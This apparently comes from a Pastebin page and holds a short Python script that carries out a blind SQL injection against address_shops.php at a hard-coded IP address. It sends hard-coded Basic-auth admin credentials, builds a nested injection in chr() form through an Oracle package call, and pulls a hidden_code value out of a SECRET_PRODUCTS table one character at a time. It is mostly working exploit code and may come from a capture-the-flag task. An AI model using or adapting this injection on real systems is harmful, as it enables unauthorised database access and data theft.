Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- import requests
- import re
- import sys
- def enc(text):
- return '||'.join(map(lambda x : 'chr(%s)' % ord(x), list(text)))
- def pwn(cmd):
- url = "http://195.133.87.173/address_shops.php?debug=1&city=xxx''%s') as branch from dual -- " % cmd
- r = requests.get(url, headers = {'Authorization' : 'Basic YWRtaW46UEBzc3cwcmQ5ODIzXyNAIWhocXF5aQ=='}).content
- return r
- for i in xrange(1, 100):
- html = pwn(" and 1=0 union all select cast((select PHD_IV_OWNER2.shop_private_pkg.GET_PRODUCT_QUANTITY(%s) from dual) as varchar(1000)) from dual -- " % enc("x' union all select ascii(substr(hidden_code,%s,1)) from SECRET_PRODUCTS where hidden_code is not null -- " % i))
- m = re.search('<tr>(\d+)</tr>', html, re.DOTALL)
- if m:
- sys.stdout.write(chr(int(m.group(1))))
- else:
- break
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
